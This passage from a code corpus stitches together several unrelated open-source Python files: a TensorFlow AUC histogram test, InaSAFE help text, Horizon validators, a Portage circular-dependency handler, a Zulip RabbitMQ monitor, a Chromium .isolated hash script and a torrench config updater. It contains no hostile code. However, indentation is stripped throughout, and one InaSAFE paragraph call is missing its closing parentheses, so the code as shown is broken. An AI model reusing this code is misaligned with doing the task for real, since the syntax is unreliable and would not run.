num_records: Positive integer. The number of records to return.
frac_true: Number in (0, 1). Expected fraction of resultant labels that
will be True. This is just in expectation...more or less may actually
be True.
atol: Absolute tolerance for final AUC estimate.
num_updates: Update internal histograms this many times, each with a new
batch of synthetic data, before computing final AUC.
Raises:
AssertionError: If resultant AUC is not within atol of theoretical AUC
from synthetic data.
"""
    score_range = score_range or [0, 1.]
with self.test_session():
labels = array_ops.placeholder(dtypes.bool, shape=[num_records])
scores = array_ops.placeholder(dtypes.float32, shape=[num_records])
auc, update_op = histogram_ops.auc_using_histogram(
labels, scores, score_range, nbins=nbins)
variables.local_variables_initializer().run()
# Updates, then extract auc.
for _ in range(num_updates):
labels_a, scores_a = synthetic_data(desired_auc, score_range,
num_records, self.rng, frac_true)
update_op.run(feed_dict={labels: labels_a, scores: scores_a})
labels_a, scores_a = synthetic_data(desired_auc, score_range, num_records,
self.rng, frac_true)
# Fetch current auc, and verify that fetching again doesn't change it.
auc_eval = auc.eval()
self.assertAlmostEqual(auc_eval, auc.eval(), places=5)
msg = ('nbins: %s, desired_auc: %s, score_range: %s, '
'num_records: %s, frac_true: %s, num_updates: %s') % (nbins,
desired_auc,
score_range,
num_records,
frac_true,
num_updates)
np.testing.assert_allclose(desired_auc, auc_eval, atol=atol, err_msg=msg)
def synthetic_data(desired_auc, score_range, num_records, rng, frac_true):
"""Create synthetic boolean_labels and scores with adjustable auc.
Args:
desired_auc: Number in [0, 1], the theoretical AUC of resultant data.
score_range: 2-tuple, (low, high), giving the range of the resultant scores
num_records: Positive integer. The number of records to return.
rng: Initialized np.random.RandomState random number generator
frac_true: Number in (0, 1). Expected fraction of resultant labels that
will be True. This is just in expectation...more or less may actually be
True.
Returns:
boolean_labels: np.array, dtype=bool.
scores: np.array, dtype=np.float32
"""
# We prove here why the method (below) for computing AUC works. Of course we
# also checked this against sklearn.metrics.roc_auc_curve.
#
# First do this for score_range = [0, 1], then rescale.
# WLOG assume AUC >= 0.5, otherwise we will solve for AUC >= 0.5 then swap
# the labels.
# So for AUC in [0, 1] we create False and True labels
# and corresponding scores drawn from:
# F ~ U[0, 1], T ~ U[x, 1]
# We have,
# AUC
# = P[T > F]
# = P[T > F | F < x] P[F < x] + P[T > F | F > x] P[F > x]
# = (1 * x) + (0.5 * (1 - x)).
# Inverting, we have:
# x = 2 * AUC - 1, when AUC >= 0.5.
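  # Quick numeric check of the inversion (illustrative): desired_auc = 0.75
  # gives x = 2 * 0.75 - 1 = 0.5, and substituting back,
  # AUC = 1 * x + 0.5 * (1 - x) = 0.5 + 0.25 = 0.75 as expected.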
assert 0 <= desired_auc <= 1
assert 0 < frac_true < 1
if desired_auc < 0.5:
flip_labels = True
desired_auc = 1 - desired_auc
frac_true = 1 - frac_true
else:
flip_labels = False
x = 2 * desired_auc - 1
labels = rng.binomial(1, frac_true, size=num_records).astype(bool)
num_true = labels.sum()
num_false = num_records - labels.sum()
# Draw F ~ U[0, 1], and T ~ U[x, 1]
false_scores = rng.rand(num_false)
true_scores = x + rng.rand(num_true) * (1 - x)
# Reshape [0, 1] to score_range.
def reshape(scores):
return score_range[0] + scores * (score_range[1] - score_range[0])
false_scores = reshape(false_scores)
true_scores = reshape(true_scores)
# Place into one array corresponding with the labels.
scores = np.nan * np.ones(num_records, dtype=np.float32)
scores[labels] = true_scores
scores[~labels] = false_scores
if flip_labels:
labels = ~labels
return labels, scores
if __name__ == '__main__':
test.main()
| apache-2.0 |
dynaryu/inasafe | safe/gui/tools/help/needs_manager_help.py | 2 | 10496 | # coding=utf-8
"""Context help for minimum needs manager dialog."""
from safe.utilities.i18n import tr
from safe import messaging as m
from safe.messaging import styles
INFO_STYLE = styles.INFO_STYLE
__author__ = 'ismailsunni'
def needs_manager_helps():
"""Help message for Batch Dialog.
.. versionadded:: 3.2.1
:returns: A message object containing helpful information.
:rtype: messaging.message.Message
"""
message = m.Message()
message.add(m.Brand())
message.add(heading())
message.add(content())
return message
def heading():
"""Helper method that returns just the header.
This method was added so that the text could be reused in the
other contexts.
.. versionadded:: 3.2.2
:returns: A heading object.
:rtype: safe.messaging.heading.Heading
"""
message = m.Heading(tr('Minimum needs manager help'), **INFO_STYLE)
return message
def content():
"""Helper method that returns just the content.
This method was added so that the text could be reused in the
dock_help module.
.. versionadded:: 3.2.2
:returns: A message object without brand element.
:rtype: safe.messaging.message.Message
"""
message = m.Message()
message.add(m.Paragraph(tr(
'During and after a disaster, providing for the basic human minimum '
'needs of food, water, hygiene and shelter is an important element of '
'your contingency plan. InaSAFE has a customisable minimum needs '
'system that allows you to define country or region specific '
'requirements for compiling a needs report where the exposure '
'layer represents population.'
)))
message.add(m.Paragraph(tr(
'By default InaSAFE uses minimum needs defined for Indonesia - '
'and ships with additional profiles for the Philippines and Tanzania. '
'You can customise these or add your own region-specific profiles too.'
)))
message.add(m.Paragraph(tr(
        'Minimum needs are grouped into regional or linguistic \'profiles\'. '
        'The default profile is \'BNPB_en\' - the English profile for the '
        'national disaster agency in Indonesia. '
        'You will see that this profile defines requirements for displaced '
        'persons in terms of Rice, Drinking Water, Clean Water (for bathing '
        'etc.), Family Kits (with personal hygiene items) and provision of '
        'toilets.'
message.add(m.Paragraph(tr(
'Each item in the profile can be customised or removed. For example '
'selecting the first item in the list and then clicking on the '
        '\'pencil\' icon will show the details of how it was defined. '
'If you scroll up and down in the panel you will see that for each '
'item, you can set a name, description, units (in singular, '
'plural and abbreviated forms), specify maxima and minima for the '
'quantity of item allowed, a default and a frequency. You would use '
'the maxima and minima to ensure that disaster managers never '
'allocate amounts that will not be sufficient for human livelihood, '
'and also that will not overtax the logistics operation for those '
'providing humanitarian relief.'
)))
message.add(m.Paragraph(tr(
        'The final item in the item configuration is the \'readable '
        'sentence\', which bears special discussion. Using a simple system of tokens you '
'can construct a sentence that will be used in the generated needs '
'report.'
)))
message.add(m.Heading(tr('Minimum needs profiles'), **INFO_STYLE))
message.add(m.Paragraph(tr(
'A profile is a collection of resources that define the minimum needs '
'for a particular country or region. Typically a profile should be '
'based on a regional, national or international standard. The '
'actual definition of which resources are needed in a given '
'profile is dependent on the local conditions and customs for the '
'area where the contingency plan is being devised.'
)))
message.add(m.Paragraph(tr(
'For example in the middle east, rice is a staple food whereas in '
'South Africa, maize meal is a staple food and thus the contingency '
'planning should take these localised needs into account.'
)))
message.add(m.Heading(tr('Minimum needs resources'), **INFO_STYLE))
message.add(m.Paragraph(tr(
'Each item in a minimum needs profile is a resource. Each resource '
'is described as a simple natural language sentence e.g.:'
)))
message.add(m.EmphasizedText(tr(
'Each person should be provided with 2.8 kilograms of Rice weekly.'
)))
message.add(m.Paragraph(tr(
'By clicking on a resource entry in the profile window, and then '
'clicking the black pencil icon you will be able to edit the '
'resource using the resource editor. Alternatively you can create a '
'new resource for a profile by clicking on the black + icon in '
'the profile manager. You can also remove any resource from a '
'profile using the - icon in the profile manager.')))
message.add(m.Heading(tr('Resource Editor'), **INFO_STYLE))
message.add(m.Paragraph(tr(
'When switching to edit or add resource mode, the minimum needs '
'manager will be updated to show the resource editor. Each '
'resource is described in terms of:'
)))
bullets = m.BulletedList()
bullets.add(m.Text(
m.ImportantText(tr(
'resource name')),
tr(' - e.g. Rice')))
bullets.add(m.Text(
m.ImportantText(tr(
'a description of the resource')),
tr(' - e.g. Basic food')))
bullets.add(m.Text(
m.ImportantText(tr(
'unit in which the resource is provided')),
tr(' - e.g. kilogram')))
bullets.add(m.Text(
m.ImportantText(tr(
'pluralised form of the units')),
tr(' - e.g. kilograms')))
bullets.add(m.Text(
m.ImportantText(tr(
'abbreviation for the unit')),
tr(' - e.g. kg')))
bullets.add(m.Text(
m.ImportantText(tr(
'the default allocation for the resource')),
tr(' - e.g. 2.8. This number can be overridden on a '
'per-analysis basis')))
bullets.add(m.Text(
m.ImportantText(tr(
'minimum allowed which is used to prevent allocating')),
tr(' - e.g. no drinking water to displaced persons')))
bullets.add(m.ImportantText(tr(
'maximum allowed which is used to set a sensible upper '
'limit for the resource')))
bullets.add(m.ImportantText(tr(
'a readable sentence which is used to compile the '
'sentence describing the resource in reports.')))
message.add(bullets)
message.add(m.Paragraph(tr(
        'These parameters are probably all fairly self-explanatory, but '
'the readable sentence probably needs further detail. The '
'sentence is compiled using a simple keyword token replacement '
'system. The following tokens can be used:')))
bullets = m.BulletedList()
bullets.add(m.Text('{{ Default }}'))
bullets.add(m.Text('{{ Unit }}'))
bullets.add(m.Text('{{ Units }}'))
bullets.add(m.Text('{{ Unit abbreviation }}'))
bullets.add(m.Text('{{ Resource name }}'))
bullets.add(m.Text('{{ Frequency }}'))
bullets.add(m.Text('{{ Minimum allowed }}'))
bullets.add(m.Text('{{ Maximum allowed }}'))
message.add(bullets)
message.add(m.Paragraph(tr(
'When the token is placed in the sentence it will be replaced with '
'the actual value at report generation time. This contrived example '
'shows a tokenised sentence that includes all possible keywords:'
)))
message.add(m.EmphasizedText(tr(
'A displaced person should be provided with {{ %s }} '
'{{ %s }}/{{ %s }}/{{ %s }} of {{ %s }}. Though no less than {{ %s }} '
'and no more than {{ %s }}. This should be provided {{ %s }}.' % (
'Default',
'Unit',
'Units',
'Unit abbreviation',
'Resource name',
'Minimum allowed',
'Maximum allowed',
'Frequency'
)
)))
message.add(m.Paragraph(tr(
'Would generate a human readable sentence like this:')))
message.add(m.ImportantText(tr(
'A displaced person should be provided with 2.8 kilogram/kilograms/kg '
'of rice. Though no less than 0 and no more than 100. This should '
'be provided daily.'
)))
message.add(m.Paragraph(tr(
'Once you have populated the resource elements, click the Save '
'resource button to return to the profile view. You will see the '
'new resource added in the profile\'s resource list.'
)))
message.add(m.Heading(tr('Managing profiles'), **INFO_STYLE))
message.add(m.Paragraph(tr(
'In addition to the profiles that come as standard with InaSAFE, you '
'can create new ones, either from scratch, or based on an existing '
'one (which you can then modify).'
)))
message.add(m.Paragraph(tr(
'Use the New button to create new profile. When prompted, give your '
'profile a name e.g. \'JakartaProfile\'.'
)))
message.add(m.Paragraph(tr(
'Note: The profile must be saved in your home directory under '
'.qgis2/minimum_needs in order for InaSAFE to successfully detect it.'
)))
message.add(m.Paragraph(tr(
'An alternative way to create a new profile is to use the Save as to '
'clone an existing profile. The clone profile can then be edited '
'according to your specific needs.'
)))
message.add(m.Heading(tr('Active profile'), **INFO_STYLE))
message.add(m.Paragraph(tr(
        'It is important to note that whichever profile you select in the '
        'Profile pick list will be considered active and will be used as '
        'the basis for all minimum needs analyses. You need to restart '
        'QGIS before the changed profile becomes active.'
)))
return message
| gpl-3.0 |
yjxtogo/horizon | horizon/utils/validators.py | 32 | 2470 | # Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
from django.core.exceptions import ValidationError # noqa
from django.core import validators # noqa
from django.utils.translation import ugettext_lazy as _
from horizon import conf
def validate_port_range(port):
if port not in range(-1, 65536):
raise ValidationError(_("Not a valid port number"))
def validate_ip_protocol(ip_proto):
if ip_proto not in range(-1, 256):
raise ValidationError(_("Not a valid IP protocol number"))
def password_validator():
return conf.HORIZON_CONFIG["password_validator"]["regex"]
def password_validator_msg():
return conf.HORIZON_CONFIG["password_validator"]["help_text"]
def validate_port_or_colon_separated_port_range(port_range):
"""Accepts a port number or a single-colon separated range."""
if port_range.count(':') > 1:
raise ValidationError(_("One colon allowed in port range"))
ports = port_range.split(':')
for port in ports:
try:
if int(port) not in range(-1, 65536):
raise ValidationError(_("Not a valid port number"))
except ValueError:
raise ValidationError(_("Port number must be integer"))
def validate_metadata(value):
error_msg = _('Invalid metadata entry. Use comma-separated'
' key=value pairs')
if value:
specs = value.split(",")
for spec in specs:
keyval = spec.split("=")
# ensure both sides of "=" exist, but allow blank value
if not len(keyval) == 2 or not keyval[0]:
raise ValidationError(error_msg)
# Same as POSIX [:print:]. Accordingly, diacritics are disallowed.
PRINT_REGEX = re.compile(r'^[\x20-\x7E]*$')
validate_printable_ascii = validators.RegexValidator(
PRINT_REGEX,
_("The string may only contain ASCII printable characters."),
"invalid_characters")
| apache-2.0 |
mm1ke/portage | pym/_emerge/resolver/circular_dependency.py | 8 | 9294 | # Copyright 2010-2013 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
from __future__ import print_function, unicode_literals
from itertools import chain, product
import logging
from portage.dep import use_reduce, extract_affecting_use, check_required_use, get_required_use_flags
from portage.exception import InvalidDependString
from portage.output import colorize
from portage.util import writemsg_level
from _emerge.DepPrioritySatisfiedRange import DepPrioritySatisfiedRange
from _emerge.Package import Package
class circular_dependency_handler(object):
MAX_AFFECTING_USE = 10
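	# Note: _find_suggestions() below enumerates
	# product(("disabled", "enabled"), repeat=len(affecting_use)), so this
	# cap bounds the search at 2**10 = 1024 USE combinations per parent.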
def __init__(self, depgraph, graph):
self.depgraph = depgraph
self.graph = graph
self.all_parent_atoms = depgraph._dynamic_config._parent_atoms
if "--debug" in depgraph._frozen_config.myopts:
# Show this debug output before doing the calculations
# that follow, so at least we have this debug info
# if we happen to hit a bug later.
writemsg_level("\n\ncircular dependency graph:\n\n",
level=logging.DEBUG, noiselevel=-1)
self.debug_print()
self.cycles, self.shortest_cycle = self._find_cycles()
#Guess if it is a large cluster of cycles. This usually requires
#a global USE change.
self.large_cycle_count = len(self.cycles) > 3
self.merge_list = self._prepare_reduced_merge_list()
#The digraph dump
self.circular_dep_message = self._prepare_circular_dep_message()
#Suggestions, in machine and human readable form
self.solutions, self.suggestions = self._find_suggestions()
def _find_cycles(self):
shortest_cycle = None
cycles = self.graph.get_cycles(ignore_priority=DepPrioritySatisfiedRange.ignore_medium_soft)
for cycle in cycles:
if not shortest_cycle or len(cycle) < len(shortest_cycle):
shortest_cycle = cycle
return cycles, shortest_cycle
def _prepare_reduced_merge_list(self):
"""
Create a merge to be displayed by depgraph.display().
This merge list contains only packages involved in
the circular deps.
"""
display_order = []
tempgraph = self.graph.copy()
while tempgraph:
nodes = tempgraph.leaf_nodes()
if not nodes:
node = tempgraph.order[0]
else:
node = nodes[0]
display_order.append(node)
tempgraph.remove(node)
return tuple(display_order)
def _prepare_circular_dep_message(self):
"""
Like digraph.debug_print(), but prints only the shortest cycle.
"""
if not self.shortest_cycle:
return None
msg = []
indent = ""
for pos, pkg in enumerate(self.shortest_cycle):
parent = self.shortest_cycle[pos-1]
priorities = self.graph.nodes[parent][0][pkg]
if pos > 0:
msg.append(indent + "%s (%s)" % (pkg, priorities[-1],))
else:
msg.append(indent + "%s depends on" % pkg)
indent += " "
pkg = self.shortest_cycle[0]
parent = self.shortest_cycle[-1]
priorities = self.graph.nodes[parent][0][pkg]
msg.append(indent + "%s (%s)" % (pkg, priorities[-1],))
return "\n".join(msg)
def _get_use_mask_and_force(self, pkg):
return pkg.use.mask, pkg.use.force
def _get_autounmask_changes(self, pkg):
needed_use_config_change = self.depgraph._dynamic_config._needed_use_config_changes.get(pkg)
if needed_use_config_change is None:
return frozenset()
use, changes = needed_use_config_change
return frozenset(changes.keys())
def _find_suggestions(self):
if not self.shortest_cycle:
return None, None
suggestions = []
final_solutions = {}
for pos, pkg in enumerate(self.shortest_cycle):
parent = self.shortest_cycle[pos-1]
priorities = self.graph.nodes[parent][0][pkg]
parent_atoms = self.all_parent_atoms.get(pkg)
if priorities[-1].buildtime:
dep = " ".join(parent._metadata[k]
for k in Package._buildtime_keys)
elif priorities[-1].runtime:
dep = parent._metadata["RDEPEND"]
for ppkg, atom in parent_atoms:
if ppkg == parent:
changed_parent = ppkg
parent_atom = atom.unevaluated_atom
break
try:
affecting_use = extract_affecting_use(dep, parent_atom,
eapi=parent.eapi)
except InvalidDependString:
if not parent.installed:
raise
affecting_use = set()
# Make sure we don't want to change a flag that is
# a) in use.mask or use.force
# b) changed by autounmask
usemask, useforce = self._get_use_mask_and_force(parent)
autounmask_changes = self._get_autounmask_changes(parent)
untouchable_flags = frozenset(chain(usemask, useforce, autounmask_changes))
affecting_use.difference_update(untouchable_flags)
#If any of the flags we're going to touch is in REQUIRED_USE, add all
#other flags in REQUIRED_USE to affecting_use, to not lose any solution.
required_use_flags = get_required_use_flags(
parent._metadata.get("REQUIRED_USE", ""),
eapi=parent.eapi)
if affecting_use.intersection(required_use_flags):
# TODO: Find out exactly which REQUIRED_USE flags are
# entangled with affecting_use. We have to limit the
# number of flags since the number of loops is
# exponentially related (see bug #374397).
total_flags = set()
total_flags.update(affecting_use, required_use_flags)
total_flags.difference_update(untouchable_flags)
if len(total_flags) <= self.MAX_AFFECTING_USE:
affecting_use = total_flags
affecting_use = tuple(affecting_use)
if not affecting_use:
continue
if len(affecting_use) > self.MAX_AFFECTING_USE:
# Limit the number of combinations explored (bug #555698).
				# First, discard irrelevant flags that are not enabled.
# Since extract_affecting_use doesn't distinguish between
# positive and negative effects (flag? vs. !flag?), assume
# a positive relationship.
current_use = self.depgraph._pkg_use_enabled(parent)
affecting_use = tuple(flag for flag in affecting_use
if flag in current_use)
if len(affecting_use) > self.MAX_AFFECTING_USE:
# There are too many USE combinations to explore in
# a reasonable amount of time.
continue
#We iterate over all possible settings of these use flags and gather
#a set of possible changes
#TODO: Use the information encoded in REQUIRED_USE
solutions = set()
for use_state in product(("disabled", "enabled"),
repeat=len(affecting_use)):
current_use = set(self.depgraph._pkg_use_enabled(parent))
for flag, state in zip(affecting_use, use_state):
if state == "enabled":
current_use.add(flag)
else:
current_use.discard(flag)
try:
reduced_dep = use_reduce(dep,
uselist=current_use, flat=True)
except InvalidDependString:
if not parent.installed:
raise
reduced_dep = None
if reduced_dep is not None and \
parent_atom not in reduced_dep:
#We found an assignment that removes the atom from 'dep'.
#Make sure it doesn't conflict with REQUIRED_USE.
required_use = parent._metadata.get("REQUIRED_USE", "")
if check_required_use(required_use, current_use,
parent.iuse.is_valid_flag,
eapi=parent.eapi):
use = self.depgraph._pkg_use_enabled(parent)
solution = set()
for flag, state in zip(affecting_use, use_state):
if state == "enabled" and \
flag not in use:
solution.add((flag, True))
elif state == "disabled" and \
flag in use:
solution.add((flag, False))
solutions.add(frozenset(solution))
for solution in solutions:
ignore_solution = False
for other_solution in solutions:
if solution is other_solution:
continue
if solution.issuperset(other_solution):
ignore_solution = True
if ignore_solution:
continue
				#Check if a USE change conflicts with use requirements of the parents.
				#If a requirement is hard, ignore the suggestion.
				#If the requirement is conditional, warn the user that other changes might be needed.
followup_change = False
parent_parent_atoms = self.depgraph._dynamic_config._parent_atoms.get(changed_parent)
for ppkg, atom in parent_parent_atoms:
atom = atom.unevaluated_atom
if not atom.use:
continue
for flag, state in solution:
if flag in atom.use.enabled or flag in atom.use.disabled:
ignore_solution = True
break
elif atom.use.conditional:
for flags in atom.use.conditional.values():
if flag in flags:
followup_change = True
break
if ignore_solution:
break
if ignore_solution:
continue
changes = []
for flag, state in solution:
if state:
changes.append(colorize("red", "+"+flag))
else:
changes.append(colorize("blue", "-"+flag))
msg = "- %s (Change USE: %s)\n" \
% (parent.cpv, " ".join(changes))
if followup_change:
msg += " (This change might require USE changes on parent packages.)"
suggestions.append(msg)
final_solutions.setdefault(pkg, set()).add(solution)
return final_solutions, suggestions
def debug_print(self):
"""
Create a copy of the digraph, prune all root nodes,
and call the debug_print() method.
"""
graph = self.graph.copy()
while True:
root_nodes = graph.root_nodes(
ignore_priority=DepPrioritySatisfiedRange.ignore_medium_soft)
if not root_nodes:
break
graph.difference_update(root_nodes)
graph.debug_print()
| gpl-2.0 |
kou/zulip | scripts/lib/check_rabbitmq_queue.py | 3 | 6873 | import json
import os
import re
import subprocess
import time
from collections import defaultdict
from typing import Any, DefaultDict, Dict, List
ZULIP_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
normal_queues = [
'deferred_work',
'digest_emails',
'email_mirror',
'embed_links',
'embedded_bots',
'error_reports',
'invites',
'email_senders',
'missedmessage_emails',
'missedmessage_mobile_notifications',
'outgoing_webhooks',
'signups',
'user_activity',
'user_activity_interval',
'user_presence',
]
OK = 0
WARNING = 1
CRITICAL = 2
UNKNOWN = 3
states = {
0: "OK",
1: "WARNING",
2: "CRITICAL",
3: "UNKNOWN",
}
MAX_SECONDS_TO_CLEAR: DefaultDict[str, int] = defaultdict(
lambda: 30,
digest_emails=1200,
missedmessage_mobile_notifications=120,
embed_links=60,
)
CRITICAL_SECONDS_TO_CLEAR: DefaultDict[str, int] = defaultdict(
lambda: 60,
missedmessage_mobile_notifications=180,
digest_emails=1800,
embed_links=90,
)
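def _example_threshold_lookup() -> None:
    # Illustrative sketch (assumption: documentation-only helper, not part of
    # the original script). Queues without an explicit entry fall back to the
    # lambda defaults of the defaultdicts above.
    assert MAX_SECONDS_TO_CLEAR['user_activity'] == 30        # default
    assert MAX_SECONDS_TO_CLEAR['digest_emails'] == 1200      # explicit override
    assert CRITICAL_SECONDS_TO_CLEAR['embed_links'] == 90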
def analyze_queue_stats(queue_name: str, stats: Dict[str, Any],
queue_count_rabbitmqctl: int) -> Dict[str, Any]:
now = int(time.time())
if stats == {}:
return dict(status=UNKNOWN,
name=queue_name,
message='invalid or no stats data')
if now - stats['update_time'] > 180 and queue_count_rabbitmqctl > 10:
# Queue isn't updating the stats file and has some events in
# the backlog, it's likely stuck.
#
# TODO: There's an unlikely race condition here - if the queue
# was fully emptied and was idle due to no new events coming
# for over 180 seconds, suddenly gets a burst of events and
# this code runs exactly in the very small time window between
# those events popping up and the queue beginning to process
# the first one (which will refresh the stats file at the very
# start), we'll incorrectly return the CRITICAL status. The
# chance of that happening should be negligible because the queue
# worker should wake up immediately and log statistics before
# starting to process the first event.
return dict(status=CRITICAL,
name=queue_name,
message='queue appears to be stuck, last update {}, queue size {}'.format(
stats['update_time'], queue_count_rabbitmqctl))
current_size = queue_count_rabbitmqctl
average_consume_time = stats['recent_average_consume_time']
if average_consume_time is None:
# Queue just started; we can't effectively estimate anything.
#
# If the queue is stuck in this state and not processing
# anything, eventually the `update_time` rule above will fire.
return dict(status=OK,
name=queue_name,
message='')
expected_time_to_clear_backlog = current_size * average_consume_time
if expected_time_to_clear_backlog > MAX_SECONDS_TO_CLEAR[queue_name]:
if expected_time_to_clear_backlog > CRITICAL_SECONDS_TO_CLEAR[queue_name]:
status = CRITICAL
else:
status = WARNING
return dict(status=status,
name=queue_name,
message=f'clearing the backlog will take too long: {expected_time_to_clear_backlog}s, size: {current_size}')
return dict(status=OK,
name=queue_name,
message='')
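# Illustrative sketch (assumption: documentation-only helper with made-up
# numbers, not part of the original script): 300 queued events at an average
# consume time of 0.5s each project a 150s backlog, which exceeds both the
# 30s warning and 60s critical defaults for a queue with no explicit entry.
def _example_analyze_queue_stats() -> None:
    stats = {'update_time': int(time.time()),
             'recent_average_consume_time': 0.5}
    result = analyze_queue_stats('user_activity', stats, 300)
    assert result['status'] == CRITICAL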
WARN_COUNT_THRESHOLD_DEFAULT = 10
CRITICAL_COUNT_THRESHOLD_DEFAULT = 50
def check_other_queues(queue_counts_dict: Dict[str, int]) -> List[Dict[str, Any]]:
""" Do a simple queue size check for queues whose workers don't publish stats files."""
results = []
for queue, count in queue_counts_dict.items():
if queue in normal_queues:
continue
if count > CRITICAL_COUNT_THRESHOLD_DEFAULT:
results.append(dict(status=CRITICAL, name=queue,
message=f'count critical: {count}'))
elif count > WARN_COUNT_THRESHOLD_DEFAULT:
results.append(dict(status=WARNING, name=queue,
message=f'count warning: {count}'))
else:
results.append(dict(status=OK, name=queue, message=''))
return results
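# Illustrative sketch (assumption: documentation-only helper with made-up
# counts): queues listed in normal_queues are skipped here because
# analyze_queue_stats() covers them; everything else is judged on size alone.
def _example_check_other_queues() -> None:
    results = check_other_queues({'user_activity': 999, 'notify_tornado': 60})
    assert [r['status'] for r in results] == [CRITICAL]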
def check_rabbitmq_queues() -> None:
pattern = re.compile(r'(\w+)\t(\d+)\t(\d+)')
    if 'USER' in os.environ and os.environ['USER'] not in ['root', 'rabbitmq']:
print("This script must be run as the root or rabbitmq user")
list_queues_output = subprocess.check_output(['/usr/sbin/rabbitmqctl', 'list_queues',
'name', 'messages', 'consumers'],
universal_newlines=True)
queue_counts_rabbitmqctl = {}
queues_with_consumers = []
for line in list_queues_output.split("\n"):
line = line.strip()
m = pattern.match(line)
if m:
queue = m.group(1)
count = int(m.group(2))
consumers = int(m.group(3))
queue_counts_rabbitmqctl[queue] = count
if consumers > 0 and not queue.startswith("notify_tornado"):
queues_with_consumers.append(queue)
queue_stats_dir = subprocess.check_output([os.path.join(ZULIP_PATH, 'scripts/get-django-setting'),
'QUEUE_STATS_DIR'],
universal_newlines=True).strip()
queue_stats: Dict[str, Dict[str, Any]] = {}
queues_to_check = set(normal_queues).intersection(set(queues_with_consumers))
for queue in queues_to_check:
fn = queue + ".stats"
file_path = os.path.join(queue_stats_dir, fn)
if not os.path.exists(file_path):
queue_stats[queue] = {}
continue
with open(file_path) as f:
try:
queue_stats[queue] = json.load(f)
except json.decoder.JSONDecodeError:
queue_stats[queue] = {}
results = []
for queue_name, stats in queue_stats.items():
results.append(analyze_queue_stats(queue_name, stats, queue_counts_rabbitmqctl[queue_name]))
results.extend(check_other_queues(queue_counts_rabbitmqctl))
status = max(result['status'] for result in results)
now = int(time.time())
if status > 0:
queue_error_template = "queue {} problem: {}:{}"
error_message = '; '.join(
queue_error_template.format(result['name'], states[result['status']], result['message'])
for result in results if result['status'] > 0
)
print(f"{now}|{status}|{states[status]}|{error_message}")
else:
print(f"{now}|{status}|{states[status]}|queues normal")
| apache-2.0 |
iansf/engine | build/find_isolated_tests.py | 142 | 2261 | #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Scans build output directory for .isolated files, calculates their SHA1
hashes, stores final list in JSON document and then removes *.isolated files
found (to ensure no stale *.isolated stay around on the next build).
Used to figure out what tests were build in isolated mode to trigger these
tests to run on swarming.
For more info see:
https://sites.google.com/a/chromium.org/dev/developers/testing/isolated-testing
"""
import glob
import hashlib
import json
import optparse
import os
import re
import sys
def hash_file(filepath):
"""Calculates the hash of a file without reading it all in memory at once."""
digest = hashlib.sha1()
with open(filepath, 'rb') as f:
while True:
chunk = f.read(1024*1024)
if not chunk:
break
digest.update(chunk)
return digest.hexdigest()
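# Illustrative sketch (assumption: documentation-only helper, not used by the
# tool): chunked hashing yields the same digest as hashing the whole file at
# once, since hashlib digests are updated incrementally.
def _example_hash_file_equivalence(filepath):
  with open(filepath, 'rb') as f:
    whole = hashlib.sha1(f.read()).hexdigest()
  assert hash_file(filepath) == whole
  return whole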
def main():
parser = optparse.OptionParser(
usage='%prog --build-dir <path> --output-json <path>',
description=sys.modules[__name__].__doc__)
parser.add_option(
'--build-dir',
help='Path to a directory to search for *.isolated files.')
parser.add_option(
'--output-json',
help='File to dump JSON results into.')
options, _ = parser.parse_args()
if not options.build_dir:
parser.error('--build-dir option is required')
if not options.output_json:
parser.error('--output-json option is required')
result = {}
# Get the file hash values and output the pair.
pattern = os.path.join(options.build_dir, '*.isolated')
for filepath in sorted(glob.glob(pattern)):
test_name = os.path.splitext(os.path.basename(filepath))[0]
if re.match(r'^.+?\.\d$', test_name):
# It's a split .isolated file, e.g. foo.0.isolated. Ignore these.
continue
# TODO(csharp): Remove deletion once the isolate tracked dependencies are
# inputs for the isolated files.
sha1_hash = hash_file(filepath)
os.remove(filepath)
result[test_name] = sha1_hash
with open(options.output_json, 'wb') as f:
json.dump(result, f)
return 0
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause |
kryptxy/torrench | torrench/utilities/Config.py | 1 | 4151 | """ Config module."""
import logging
import os
from configparser import SafeConfigParser
from torrench.utilities.Common import Common
class Config(Common):
r"""
Config class.
This class checks for config file's presence.
Also, this class manages TPB/KAT proxies; That is,
obtains TPB/KAT URL and fetches proxies thorugh those URL.
Proxies are stored as list and returned.
By default, Config files is checked in $XDG_CONFIG_HOME/torrench/ and
fallback to $HOME/.config/torrench/ directory (linux)
For windows, default location is ~\.config\torrench
This class inherits Common class.
"""
def __init__(self):
"""Initialisations."""
Common.__init__(self)
self.config = SafeConfigParser()
self.config_dir = os.getenv('XDG_CONFIG_HOME', os.path.expanduser(os.path.join('~', '.config')))
self.full_config_dir = os.path.join(self.config_dir, 'torrench')
self.config_file_name = "config.ini"
self.config_file_name_new = "config.ini.new"
self.config_file = os.path.join(self.full_config_dir, self.config_file_name)
self.config_file_new = os.path.join(self.full_config_dir, self.config_file_name_new)
self.url = None
self.name = None
self.urllist = []
self.logger = logging.getLogger('log1')
def file_exists(self):
"""To check whether config.ini file exists and is enabled or not."""
if os.path.isfile(self.config_file):
self.config.read(self.config_file)
enable = self.config.get('Torrench-Config', 'enable')
if enable == '1':
self.logger.debug("Config file exists and enabled!")
return True
def update_file(self):
try:
# Get updated copy of config.ini file.
self.logger.debug("Downloading new config.ini file")
url = "https://pastebin.com/raw/reymRHSL"
self.logger.debug("Download complete. Saving file..")
soup = self.http_request(url)
res = soup.p.get_text()
with open(self.config_file, 'w', encoding="utf-8") as f:
f.write(res)
self.logger.debug("Saved new file as {}".format(self.config_file))
# Read file and set enable = 1
self.config.read(self.config_file)
self.logger.debug("Now enabling file")
self.config.set('Torrench-Config', 'enable', '1')
# Write changes to config.ini file (self.config_file)
with open(self.config_file, 'w', encoding="utf-8") as configfile:
self.config.write(configfile)
self.logger.debug("File enabled successfull and saved.")
print("Config file updated!")
self.logger.debug("Config file updated successfully.")
except Exception as e:
print("Something went wrong. See logs for details.")
